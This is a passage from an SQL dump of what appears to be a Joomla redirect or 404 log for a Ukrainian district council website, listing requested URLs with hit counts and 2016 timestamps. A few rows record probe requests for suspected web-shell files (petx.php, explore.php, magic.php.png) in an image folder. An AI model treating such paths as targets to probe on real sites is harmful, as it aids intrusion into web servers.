00:00:00',301),(26037,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/img-7481-91','','','',6,0,'2016-02-17 06:57:27','0000-00-00 00:00:00',301),(26038,'http://www.malyn-rayrada.org.ua/index.php/413-ukaz-prezidenta-ukraini-673-2012?tmpl=component&print=1&layout=default&page=','','','',11,0,'2016-02-17 10:33:28','0000-00-00 00:00:00',301),(26039,'http://www.malyn-rayrada.org.ua/index.php/434-kozhna-posluga-povinna-buti-oplachena?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-17 10:33:33','0000-00-00 00:00:00',301),(26040,'http://www.malyn-rayrada.org.ua/index.php/455-199-rokiv-tomu-narodivsja-taras-shevchenko?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-17 10:33:37','0000-00-00 00:00:00',301),(26041,'http://www.malyn-rayrada.org.ua/index.php/796-z-dnem-peremogi_2?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-17 10:34:33','0000-00-00 00:00:00',301),(26042,'http://www.malyn-rayrada.org.ua/index.php/889-novini-fiskalnoji-sluzhbi?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-17 10:34:57','0000-00-00 00:00:00',301),(26043,'http://www.malyn-rayrada.org.ua/index.php/892-zalishilos-30-kandidativ-u-deputati?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-17 10:35:00','0000-00-00 00:00:00',301),(26044,'http://www.malyn-rayrada.org.ua/index.php/905-pristupili-do-vikonannya-obov-yazkiv-novoobrani-golovi-teritorialnikh-gromad?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-17 10:35:19','0000-00-00 00:00:00',301),(26045,'http://www.malyn-rayrada.org.ua/index.php/906-pro-sklikannya-35-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-17 10:35:22','0000-00-00 00:00:00',301),(26046,'http://www.malyn-rayrada.org.ua/index.php/932-ogoloshennya-shchodo-komunalnogo-majna-orenda?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-17 10:35:26','0000-00-00 00:00:00',301),(26047,'http://www.malyn-rayrada.org.ua/index.php/939-malinski-podatkivtsi-informuyut?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-17 10:35:30','0000-00-00 00:00:00',301),(26048,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=741:---------l----r&Itemid=82&lang=ru&option=com_content&view=article','','','',7,0,'2016-02-17 10:45:20','0000-00-00 00:00:00',301),(26049,'http://malyn-rayrada.org.ua/index.php/691-shhodo-situacii-z-medichnim-obslugovuvannjam','','','',6,0,'2016-02-17 12:25:27','0000-00-00 00:00:00',301),(26050,'http://malyn-rayrada.org.ua/index.php/829-zaversheno-pidgotovku-do-provedennja-chergovoi_5','','','',4,0,'2016-02-17 12:25:30','0000-00-00 00:00:00',301),(26051,'http://malyn-rayrada.org.ua/index.php/841-nachalnik-pensijnogo-fondu-ukraini-v-malinskomu','','','',4,0,'2016-02-17 12:25:31','0000-00-00 00:00:00',301),(26052,'http://malyn-rayrada.org.ua/index.php/905-pristupili-do-vikonannya-obov-yazkiv-novoobrani-golovi-teritorialnikh-gromad?tmpl=component&print=1&layout=default&page=','','','',9,0,'2016-02-17 12:25:36','0000-00-00 00:00:00',301),(26053,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1015:-200-&lang=en&option=com_content&view=article','','','',4,0,'2016-02-17 12:38:36','0000-00-00 00:00:00',301),(26054,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=670:2012-05-08-05-15-51&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-17 13:13:04','0000-00-00 00:00:00',301),(26055,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=543:2012-01-26-11-58-53&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-17 13:50:40','0000-00-00 00:00:00',301),(26056,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=677:------------2012-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-17 14:15:51','0000-00-00 00:00:00',301),(26057,'http://www.malyn-rayrada.org.ua/index.php?Itemid=12&catid=7&id=9:2010-06-05-15-10-04&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-17 14:54:52','0000-00-00 00:00:00',301),(26058,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=796:2012-10-18-07-54-09&Itemid=84&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-17 16:15:31','0000-00-00 00:00:00',301),(26059,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=731:2012-07-02-08-51-09&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-17 16:15:34','0000-00-00 00:00:00',301),(26060,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=318:-2007-2011&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-17 18:10:33','0000-00-00 00:00:00',301),(26061,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=791:2012-10-17-06-06-34&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-17 18:27:42','0000-00-00 00:00:00',301),(26062,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=687:2012-05-24-11-21-04&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-17 19:10:30','0000-00-00 00:00:00',301),(26063,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=941:2013-02-27-14-30-15&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-17 19:12:11','0000-00-00 00:00:00',301),(26064,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=722:2012-06-15-13-56-24&catid=43&Itemid=82&lang=uk','','','',4,0,'2016-02-17 19:55:23','0000-00-00 00:00:00',301),(26065,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=544:2012-01-26-12-03-44&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-17 21:27:07','0000-00-00 00:00:00',301),(26066,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=488:2011-12-02-06-34-46&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-17 21:30:27','0000-00-00 00:00:00',301),(26067,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=704:-20-2011-108-l-r-&lang=uk&option=com_content&view=article','','','',5,0,'2016-02-17 22:27:13','0000-00-00 00:00:00',301),(26068,'http://www.malyn-rayrada.org.ua/index.php/1130-ogoloshennya-pro-namiri-shchodo-orendi-komunalnogo-majna?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-17 23:45:58','0000-00-00 00:00:00',301),(26069,'http://www.malyn-rayrada.org.ua/index.php/1216-proponuemo-v-orendu-majnu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-17 23:46:01','0000-00-00 00:00:00',301),(26070,'http://www.malyn-rayrada.org.ua/index.php/563-do-vidoma-zhiteliv-malinshhini_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-17 23:46:21','0000-00-00 00:00:00',301),(26071,'http://www.malyn-rayrada.org.ua/index.php/730-sogodni-ves-svit-vidznachae-200-richnij-juvilej?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-17 23:46:22','0000-00-00 00:00:00',301),(26072,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=795:-20-2011-108-l-r-&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-17 23:58:43','0000-00-00 00:00:00',301),(26073,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&id=46:--21122012&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2016-02-18 01:21:04','0000-00-00 00:00:00',301),(26074,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=598:2012-02-29-14-13-44&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-18 01:31:36','0000-00-00 00:00:00',301),(26075,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=38:--19122011-&id=523:2011-12-30-10-16-28&itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-18 02:11:37','0000-00-00 00:00:00',301),(26076,'http://www.malyn-rayrada.org.ua/index.php/796-z-dnem-peremogi_2/','','','',2,0,'2016-02-18 03:14:25','0000-00-00 00:00:00',301),(26077,'http://www.malyn-rayrada.org.ua/index.php/390-malinshhina-svjatkue-90-richchja-utvorennja-rajonu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-02-18 04:56:26','0000-00-00 00:00:00',301),(26078,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=687:2012-05-24-11-21-04&catid=11&lang=uk','','','',1,0,'2016-02-18 05:02:19','0000-00-00 00:00:00',301),(26079,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=729:-l20-r&catid=11&lang=en','','','',1,0,'2016-02-18 05:02:37','0000-00-00 00:00:00',301),(26080,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=729:-l20-r&catid=11&lang=ru','','','',1,0,'2016-02-18 05:02:39','0000-00-00 00:00:00',301),(26081,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=729:-l20-r&catid=11&lang=uk','','','',1,0,'2016-02-18 05:02:40','0000-00-00 00:00:00',301),(26082,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=729:-l20-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2016-02-18 05:02:42','0000-00-00 00:00:00',301),(26083,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=730:2012-07-02-05-04-18&catid=11&lang=en','','','',1,0,'2016-02-18 05:02:44','0000-00-00 00:00:00',301),(26084,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=730:2012-07-02-05-04-18&catid=11&lang=ru','','','',1,0,'2016-02-18 05:02:45','0000-00-00 00:00:00',301),(26085,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=730:2012-07-02-05-04-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2016-02-18 05:02:49','0000-00-00 00:00:00',301),(26086,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=730:2012-07-02-05-04-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2016-02-18 05:02:51','0000-00-00 00:00:00',301),(26087,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=730:2012-07-02-05-04-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2016-02-18 05:02:53','0000-00-00 00:00:00',301),(26088,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=731:2012-07-02-08-51-09&catid=11&lang=en','','','',1,0,'2016-02-18 05:02:54','0000-00-00 00:00:00',301),(26089,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=731:2012-07-02-08-51-09&catid=11&lang=uk','','','',1,0,'2016-02-18 05:02:56','0000-00-00 00:00:00',301),(26090,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=731:2012-07-02-08-51-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2016-02-18 05:02:58','0000-00-00 00:00:00',301),(26091,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=731:2012-07-02-08-51-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2016-02-18 05:02:59','0000-00-00 00:00:00',301),(26092,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=731:2012-07-02-08-51-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2016-02-18 05:03:01','0000-00-00 00:00:00',301),(26093,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=740:-lr-&catid=43:--25072012-&Itemid=82&lang=en','','','',1,0,'2016-02-18 05:03:58','0000-00-00 00:00:00',301),(26094,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=740:-lr-&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2016-02-18 05:04:00','0000-00-00 00:00:00',301),(26095,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=740:-lr-&catid=43:--25072012-&Itemid=82&lang=uk','','','',1,0,'2016-02-18 05:04:02','0000-00-00 00:00:00',301),(26096,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=743:2012-07-26-08-11-32&catid=11&lang=uk','','','',1,0,'2016-02-18 05:04:09','0000-00-00 00:00:00',301),(26097,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=745:2012-07-30-09-12-07&catid=11&lang=uk','','','',1,0,'2016-02-18 05:04:12','0000-00-00 00:00:00',301),(26098,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=753:2012-09-05-09-48-36&catid=11&lang=uk','','','',1,0,'2016-02-18 05:04:18','0000-00-00 00:00:00',301),(26099,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=772:-2011-2012-&catid=45&Itemid=84&lang=uk','','','',1,0,'2016-02-18 05:05:13','0000-00-00 00:00:00',301),(26100,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=788:-lr-2012-2015-&catid=45&Itemid=84&lang=uk','','','',1,0,'2016-02-18 05:05:51','0000-00-00 00:00:00',301),(26101,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=791:2012-10-17-06-06-34&catid=45&Itemid=84&lang=uk','','','',1,0,'2016-02-18 05:05:59','0000-00-00 00:00:00',301),(26102,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=796:2012-10-18-07-54-09&catid=45&Itemid=84&lang=uk','','','',1,0,'2016-02-18 05:06:11','0000-00-00 00:00:00',301),(26103,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=799:2012-10-18-13-37-03&catid=45&Itemid=84&lang=uk','','','',1,0,'2016-02-18 05:06:15','0000-00-00 00:00:00',301),(26104,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=813:2012-11-12-16-44-40&catid=11&lang=uk','','','',1,0,'2016-02-18 05:07:07','0000-00-00 00:00:00',301),(26105,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=825:-q-q&catid=11&lang=uk','','','',1,0,'2016-02-18 05:07:23','0000-00-00 00:00:00',301),(26106,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=829:24-1600-l-r&catid=11&lang=en','','','',1,0,'2016-02-18 05:07:38','0000-00-00 00:00:00',301),(26107,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=829:24-1600-l-r&catid=11&lang=ru','','','',1,0,'2016-02-18 05:07:39','0000-00-00 00:00:00',301),(26108,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=829:24-1600-l-r&catid=11&lang=uk','','','',1,0,'2016-02-18 05:07:42','0000-00-00 00:00:00',301),(26109,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=829:24-1600-l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2016-02-18 05:07:45','0000-00-00 00:00:00',301),(26110,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=830:2012-11-27-08-09-31&catid=11&lang=en','','','',1,0,'2016-02-18 05:07:47','0000-00-00 00:00:00',301),(26111,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=830:2012-11-27-08-09-31&catid=11&lang=ru','','','',1,0,'2016-02-18 05:07:50','0000-00-00 00:00:00',301),(26112,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=830:2012-11-27-08-09-31&catid=11&lang=uk','','','',1,0,'2016-02-18 05:07:52','0000-00-00 00:00:00',301),(26113,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=830:2012-11-27-08-09-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2016-02-18 05:07:54','0000-00-00 00:00:00',301),(26114,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=830:2012-11-27-08-09-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2016-02-18 05:07:56','0000-00-00 00:00:00',301),(26115,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11&lang=uk','','','',1,0,'2016-02-18 05:10:21','0000-00-00 00:00:00',301),(26116,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=uk','','','',1,0,'2016-02-18 05:10:41','0000-00-00 00:00:00',301),(26117,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1130-2013-11-07-14-04-12?lang=uk','','','',1,0,'2016-02-18 06:06:31','0000-00-00 00:00:00',301),(26118,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=466:-l-r-2011-&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-18 08:57:44','0000-00-00 00:00:00',301),(26119,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/957-199-?lang=uk','','','',1,0,'2016-02-18 10:56:10','0000-00-00 00:00:00',301),(26120,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1004-2013-05-04-11-41-00?lang=uk','','','',1,0,'2016-02-18 11:01:23','0000-00-00 00:00:00',301),(26121,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1130-2013-11-07-14-04-12?lang=ru','','','',1,0,'2016-02-18 11:29:34','0000-00-00 00:00:00',301),(26122,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1059-2013-07-24-05-42-15?lang=ru','','','',1,0,'2016-02-18 11:35:13','0000-00-00 00:00:00',301),(26123,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&id=42&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2016-02-18 14:27:24','0000-00-00 00:00:00',301),(26124,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=774:2012-10-02-09-30-45&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-18 20:52:19','0000-00-00 00:00:00',301),(26125,'http://malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1052:2013-07-19-11-32-33&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-18 22:11:42','0000-00-00 00:00:00',301),(26126,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=820:2012-11-14-16-42-11&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-19 00:00:36','0000-00-00 00:00:00',301),(26127,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1278-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-yaka-peredaetsya-v-orendu-gr-beginu-v-m','','','',1,0,'2016-02-19 02:25:48','0000-00-00 00:00:00',301),(26128,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=563:-------30012012185-12&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2016-02-19 05:16:59','0000-00-00 00:00:00',301),(26129,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1256-pro-kompleksnu-programu-pidtrimki-diyalnosti-komunalnoji-ustanovi-malinskij-rajonnij-trudovij-arkhiv-malinskoji-rajonnoji-radi-na-2016-2021roki','','','',3,0,'2016-02-19 09:15:39','0000-00-00 00:00:00',301),(26130,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=799:2012-10-18-13-37-03&Itemid=84&lang=en&option=com_content&view=article','','','',1,0,'2016-02-19 09:38:56','0000-00-00 00:00:00',301),(26131,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=ru&limitstart=20','','','',1,0,'2016-02-19 12:22:41','0000-00-00 00:00:00',301),(26132,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=51&layout=blog&Itemid=92&lang=ru&limitstart=20','','','',1,0,'2016-02-19 13:24:06','0000-00-00 00:00:00',301),(26133,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=462:-2012-&catid=38:--19122011-&Itemid=73&lang=ru','','','',4,0,'2016-02-19 15:38:08','0000-00-00 00:00:00',301),(26134,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=742:-14-&lang=en&option=com_content&view=article','','','',5,0,'2016-02-19 16:28:15','0000-00-00 00:00:00',301),(26135,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1290-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-iz-zemleustroyu-shchodo-vnesennya-zmin-v-proekt-formuvannya-teritoriji-i-stanovlennya-mezh-malinivskoji','','','',1,0,'2016-02-19 16:40:11','0000-00-00 00:00:00',301),(26136,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=51:--19072013-&layout=blog&Itemid=92&lang=ru&limitstart=20','','','',2,0,'2016-02-19 17:17:31','0000-00-00 00:00:00',301),(26137,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=799:2012-10-18-13-37-03&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-19 17:46:13','0000-00-00 00:00:00',301),(26138,'http://malyn-rayrada.org.ua/index.php/1130-ogoloshennya-pro-namiri-shchodo-orendi-komunalnogo-majna','','','',3,0,'2016-02-19 17:58:10','0000-00-00 00:00:00',301),(26139,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=468:-15-2011-120-l-r&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-19 23:42:54','0000-00-00 00:00:00',301),(26140,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/koorrada5-142','','','',5,0,'2016-02-20 00:56:02','0000-00-00 00:00:00',301),(26141,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0954-13-100','','','',5,0,'2016-02-20 00:56:23','0000-00-00 00:00:00',301),(26142,'http://malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1151:2013-11-28-14-54-33&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-20 01:49:36','0000-00-00 00:00:00',301),(26143,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=314:2011-05-20-13-01-00&catid=33:-20052011&Itemid=66&lang=en','','','',1,0,'2016-02-20 06:08:51','0000-00-00 00:00:00',301),(26144,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=562:-19122011194-30122011202&catid=39&Itemid=76&lang=ru','','','',1,0,'2016-02-20 06:20:33','0000-00-00 00:00:00',301),(26145,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=39:-22022012-&id=565:2012-02-03-09-48-29&itemid=76&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-20 06:39:41','0000-00-00 00:00:00',301),(26146,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=1106:-qq&Itemid=18&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-20 07:50:33','0000-00-00 00:00:00',301),(26147,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/images/stories/afgan.jpg','','','',1,0,'2016-02-20 08:13:16','0000-00-00 00:00:00',301),(26148,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/images/stories/svinn.jpg','','','',1,0,'2016-02-20 08:13:24','0000-00-00 00:00:00',301),(26149,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/images/stories/petx.php?baca','','','',1,0,'2016-02-20 10:00:22','0000-00-00 00:00:00',301),(26150,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/images/stories/explore.php?baca','','','',1,0,'2016-02-20 10:00:24','0000-00-00 00:00:00',301),(26151,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/images/stories/magic.php.png','','','',1,0,'2016-02-20 10:00:44','0000-00-00 00:00:00',301),(26152,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/images/stories/magic.php.png?baca','','','',1,0,'2016-02-20 10:00:45','0000-00-00 00:00:00',301),(26153,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1255-pro-programu-rozvitku-donorstva-krovi-ta-jiji-komponentiv-u-malinskomu-rajoni-na-2015-2018-roki','','','',4,0,'2016-02-20 13:41:27','0000-00-00 00:00:00',301),(26155,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1291-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-iz-zemleustroyu-shchodo-vnesennya-zmin-v-proekt-formuvannya-teritoriji-i-stanovlennya-mezh-lyubovitskoj','','','',1,0,'2016-02-20 23:58:33','0000-00-00 00:00:00',301),(26156,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/page1-27-119','','','',2,0,'2016-02-21 00:22:35','0000-00-00 00:00:00',301),(26157,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-69','','','',1,0,'2016-02-21 14:14:41','0000-00-00 00:00:00',301),(26158,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=729:-l20-r&catid=11&Itemid=14&lang=uk','','','',1,0,'2016-02-21 16:37:57','0000-00-00 00:00:00',301),(26159,'http://www.malyn-rayrada.org.ua/index.php/component/acepolls/poll/1-perevibori-zminyat-situatsiyu-v-krajini','','','',20,0,'2016-02-21 16:38:31','0000-00-00 00:00:00',301),(26160,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=976:2013-03-21-18-42-06','','','',1,0,'2016-02-21 22:24:19','0000-00-00 00:00:00',301),(26161,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=218:2010-12-21-06-45-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2016-02-21 22:28:25','0000-00-00 00:00:00',301),(26162,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=729:-l20-r&Itemid=0&lang=ru&option=com_content&view=article','','','',33,0,'2016-02-21 23:38:19','0000-00-00 00:00:00',301),(26163,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=825:-q-q&Itemid=0&lang=uk&option=com_content&view=article','','','',44,0,'2016-02-21 23:38:52','0000-00-00 00:00:00',301),(26164,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=939:-18-&Itemid=&lang=ru&option=com_content&view=article','','','',25,0,'2016-02-21 23:39:24','0000-00-00 00:00:00',301),(26165,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=970:-90-&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-02-21 23:39:26','0000-00-00 00:00:00',301),(26166,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=939:-18-&Itemid=0&lang=ru&option=com_content&view=article','','','',26,0,'2016-02-21 23:39:32','0000-00-00 00:00:00',301),(26167,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=978:-6612-&Itemid=14&lang=en&option=com_content&view=article','','','',14,0,'2016-02-21 23:39:39','0000-00-00 00:00:00',301),(26168,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=978:-6612-&Itemid=0&lang=uk&option=com_content&view=article','','','',6,0,'2016-02-21 23:39:40','0000-00-00 00:00:00',301),(26169,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1066:-23-&Itemid=&lang=ru&option=com_content&view=article','','','',19,0,'2016-02-21 23:39:44','0000-00-00 00:00:00',301),(26170,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=990:-2013-&Itemid=&lang=uk&option=com_content&view=article','','','',22,0,'2016-02-21 23:39:45','0000-00-00 00:00:00',301),(26171,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1106:-qq&Itemid=&lang=uk&option=com_content&view=article','','','',31,0,'2016-02-21 23:39:47','0000-00-00 00:00:00',301),(26172,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=972:2013-03-19-10-50-05&Itemid=88&lang=ru&option=com_content&view=article','','','',10,0,'2016-02-21 23:42:18','0000-00-00 00:00:00',301),(26173,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=18:2010-06-06-10-06-41&Itemid=0&lang=uk&option=com_content&view=article','','','',25,0,'2016-02-21 23:43:30','0000-00-00 00:00:00',301),(26174,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=991:2013-04-22-08-24-54&Itemid=&lang=uk&option=com_content&view=article','','','',52,0,'2016-02-21 23:43:44','0000-00-00 